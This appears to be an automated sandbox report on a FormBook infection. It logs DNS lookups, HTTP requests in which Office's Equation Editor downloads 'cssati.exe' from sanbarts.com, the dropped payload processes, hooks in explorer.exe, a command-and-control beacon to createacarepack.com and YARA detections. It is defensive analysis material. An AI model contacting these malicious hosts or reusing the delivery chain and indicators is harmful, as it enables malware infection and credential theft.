                                                        May 27, 2022 21:20:09.627335072 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.627352953 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.627368927 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.627443075 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.629139900 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.642915964 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.642956018 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.642973900 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.642992973 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:09.643028975 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:09.643062115 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096009970 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096046925 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096069098 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096086979 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096103907 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096121073 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096138000 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096155882 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096172094 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096184015 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096200943 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096218109 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096234083 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096240044 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096251965 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096263885 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096267939 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096271038 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096271038 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096273899 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096276999 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096288919 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096292019 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096307039 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096307993 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.096322060 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.096345901 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.098190069 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.189691067 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.189721107 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.189739943 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.189802885 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.189841032 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.205245018 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.205271959 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.205288887 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.205305099 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.205324888 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.205337048 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.205439091 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.205450058 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.205470085 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.205496073 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.205517054 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.236854076 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.236876011 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.236893892 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.236911058 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.236927986 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.236946106 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.236963034 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.236980915 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.236980915 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.236998081 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.237000942 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.237010956 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.237015009 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.237035990 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.237059116 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.237435102 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.283444881 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.283473015 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.283490896 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.283507109 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.283524990 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.283585072 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.285192013 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.314755917 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.314793110 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.314810991 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.314824104 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.314840078 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.314857960 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.314874887 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.314960003 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.317132950 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.689707994 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.689747095 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.689765930 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.689788103 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.689805031 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.689822912 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.689840078 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.689857006 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.689930916 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.691651106 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.691672087 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.729345083 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729373932 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729392052 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729413986 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729419947 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.729437113 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.729439020 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729446888 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.729460001 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729480982 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.729481936 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729506016 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729521990 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.729523897 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.729536057 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.729547977 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.729569912 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.731208086 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.767855883 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.767889023 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.767911911 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.767935038 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.767946005 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.767956018 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.767976046 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.767997980 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.767998934 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768008947 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768017054 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768022060 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768024921 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768029928 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768035889 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768044949 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768066883 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768079996 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768088102 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768090963 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768107891 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768114090 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768120050 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768135071 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768151999 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768172979 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768178940 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768196106 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768214941 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768223047 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768224955 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768229961 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768237114 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768245935 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768269062 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768279076 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768292904 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768294096 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768310070 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768315077 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768332005 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768338919 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768349886 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768358946 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768379927 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768388033 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768399954 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768409967 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768415928 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768430948 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768452883 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768452883 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768466949 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768474102 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768512011 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768516064 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768526077 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768533945 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768546104 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768557072 CEST804917445.120.185.113192.168.2.22
                                                        May 27, 2022 21:20:10.768573046 CEST4917480192.168.2.2245.120.185.113
                                                        May 27, 2022 21:20:10.768578053 CEST804917445.120.185.113192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 27, 2022 21:20:07.500580072 CEST | 192.168.2.22 | 8.8.8.8 | 0xcd9 | Standard query (0) | sanbarts.com | A (IP address) | IN (0x0001)
May 27, 2022 21:20:07.697839022 CEST | 192.168.2.22 | 8.8.8.8 | 0xf72 | Standard query (0) | www.sanbarts.com | A (IP address) | IN (0x0001)
May 27, 2022 21:21:30.526065111 CEST | 192.168.2.22 | 8.8.8.8 | 0xc4a9 | Standard query (0) | www.storyofsol.com | A (IP address) | IN (0x0001)
May 27, 2022 21:21:48.877341032 CEST | 192.168.2.22 | 8.8.8.8 | 0x1666 | Standard query (0) | www.createacarepack.com | A (IP address) | IN (0x0001)
May 27, 2022 21:22:09.726602077 CEST | 192.168.2.22 | 8.8.8.8 | 0x723c | Standard query (0) | www.paypal-caseid521.com | A (IP address) | IN (0x0001)

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 27, 2022 21:20:07.519690990 CEST | 8.8.8.8 | 192.168.2.22 | 0xcd9 | No error (0) | sanbarts.com |  | 194.9.94.86 | A (IP address) | IN (0x0001)
May 27, 2022 21:20:07.519690990 CEST | 8.8.8.8 | 192.168.2.22 | 0xcd9 | No error (0) | sanbarts.com |  | 194.9.94.85 | A (IP address) | IN (0x0001)
May 27, 2022 21:20:07.747270107 CEST | 8.8.8.8 | 192.168.2.22 | 0xf72 | No error (0) | www.sanbarts.com | 215ffbc1941f6023.7host.cn |  | CNAME (Canonical name) | IN (0x0001)
May 27, 2022 21:20:07.747270107 CEST | 8.8.8.8 | 192.168.2.22 | 0xf72 | No error (0) | 215ffbc1941f6023.7host.cn |  | 45.120.185.113 | A (IP address) | IN (0x0001)
May 27, 2022 21:21:30.566380978 CEST | 8.8.8.8 | 192.168.2.22 | 0xc4a9 | Name error (3) | www.storyofsol.com | none | none | A (IP address) | IN (0x0001)
May 27, 2022 21:21:49.139980078 CEST | 8.8.8.8 | 192.168.2.22 | 0x1666 | No error (0) | www.createacarepack.com | sbsfe-p8.geo.mf0.yahoodns.net |  | CNAME (Canonical name) | IN (0x0001)
May 27, 2022 21:21:49.139980078 CEST | 8.8.8.8 | 192.168.2.22 | 0x1666 | No error (0) | sbsfe-p8.geo.mf0.yahoodns.net |  | 98.137.244.37 | A (IP address) | IN (0x0001)
May 27, 2022 21:22:09.749313116 CEST | 8.8.8.8 | 192.168.2.22 | 0x723c | Name error (3) | www.paypal-caseid521.com | none | none | A (IP address) | IN (0x0001)
                                                        • sanbarts.com
                                                        • www.sanbarts.com
                                                        • www.createacarepack.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49173 | 194.9.94.86 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
May 27, 2022 21:20:07.586997986 CEST | 2 | OUT | GET /cssati.exe HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Host: sanbarts.com
                                                        Connection: Keep-Alive
May 27, 2022 21:20:07.626665115 CEST | 2 | IN | HTTP/1.1 302 Moved Temporarily
                                                        Server: nginx
                                                        Date: Fri, 27 May 2022 19:20:07 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 138
                                                        Connection: keep-alive
                                                        Location: http://www.sanbarts.com/cssati.exe
                                                        Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49174 | 45.120.185.113 | 80 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp | kBytes transferred | Direction | Data
May 27, 2022 21:20:08.064167976 CEST | 3 | OUT | GET /cssati.exe HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                        Connection: Keep-Alive
                                                        Host: www.sanbarts.com
May 27, 2022 21:20:08.378580093 CEST | 4 | IN | HTTP/1.1 200 OK
                                                        Content-Type: application/octet-stream
                                                        Last-Modified: Thu, 26 May 2022 00:40:19 GMT
                                                        Accept-Ranges: bytes
                                                        ETag: "4042e42c9970d81:0"
                                                        Server: Microsoft-IIS/10.0
                                                        X-Powered-By: ASP.NET
                                                        Date: Fri, 27 May 2022 19:20:07 GMT
                                                        Content-Length: 299113


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49175 | 98.137.244.37 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
May 27, 2022 21:21:49.331468105 CEST | 318 | OUT | GET /nk6l/?m6A=oZdYOW+9zhrIvNs3Uj0B160nPucVBdi4gaKHGG9IIOI6c6Yjw1TqFPH8yZ8k/nW4CFXcqw==&lJE=gtqHRlRHi HTTP/1.1
                                                        Host: www.createacarepack.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
May 27, 2022 21:21:49.504925966 CEST | 318 | IN | HTTP/1.1 404 Not Found
                                                        Date: Fri, 27 May 2022 19:21:49 GMT
                                                        P3P: policyref="https://policies.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
                                                        Vary: Accept-Encoding
                                                        Content-Length: 73
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Age: 0
                                                        Connection: close
                                                        Server: ATS
                                                        Data Ascii: <h1 style='color:#497A97;font-size:12pt;font-weight:bold'>404 - Not Found


                                                        Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEB
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEB
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEB
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEB

                                                        Target ID:0
                                                        Start time:21:20:14
                                                        Start date:27/05/2022
                                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                        Wow64 process (32bit):false
                                                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                        Imagebase:0x13f5b0000
                                                        File size:1423704 bytes
                                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:2
                                                        Start time:21:20:17
                                                        Start date:27/05/2022
                                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                        Imagebase:0x400000
                                                        File size:543304 bytes
                                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:high

                                                        Target ID:4
                                                        Start time:21:20:21
                                                        Start date:27/05/2022
                                                        Path:C:\Users\user\AppData\Roaming\word.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Roaming\word.exe
                                                        Imagebase:0x400000
                                                        File size:299113 bytes
                                                        MD5 hash:C6E799EEEBA0345DE98B4E9A6AC76B82
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Antivirus matches:
                                                        • Detection: 9%, Metadefender, Browse
                                                        • Detection: 62%, ReversingLabs
                                                        Reputation:low

                                                        Target ID:5
                                                        Start time:21:20:23
                                                        Start date:27/05/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\dvukljmnr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
                                                        Imagebase:0x9a0000
                                                        File size:191488 bytes
                                                        MD5 hash:9CECB9E88C1FF3D7A4FFC8BFEB27C2E1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.923111681.0000000000160000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Antivirus matches:
                                                        • Detection: 69%, ReversingLabs
                                                        Reputation:low

                                                        Target ID:6
                                                        Start time:21:20:24
                                                        Start date:27/05/2022
                                                        Path:C:\Users\user\AppData\Local\Temp\dvukljmnr.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:C:\Users\user\AppData\Local\Temp\dvukljmnr.exe C:\Users\user\AppData\Local\Temp\xxsjdcnfw
                                                        Imagebase:0x9a0000
                                                        File size:191488 bytes
                                                        MD5 hash:9CECB9E88C1FF3D7A4FFC8BFEB27C2E1
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.983836372.0000000000130000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.983901673.0000000000240000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.983955390.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.922358933.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.921486014.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        Reputation:low

                                                        Target ID:7
                                                        Start time:21:20:30
                                                        Start date:27/05/2022
                                                        Path:C:\Windows\explorer.exe
                                                        Wow64 process (32bit):false
                                                        Commandline:C:\Windows\Explorer.EXE
                                                        Imagebase:0xff040000
                                                        File size:3229696 bytes
                                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000000.959911974.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000000.975797986.000000000BAD3000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
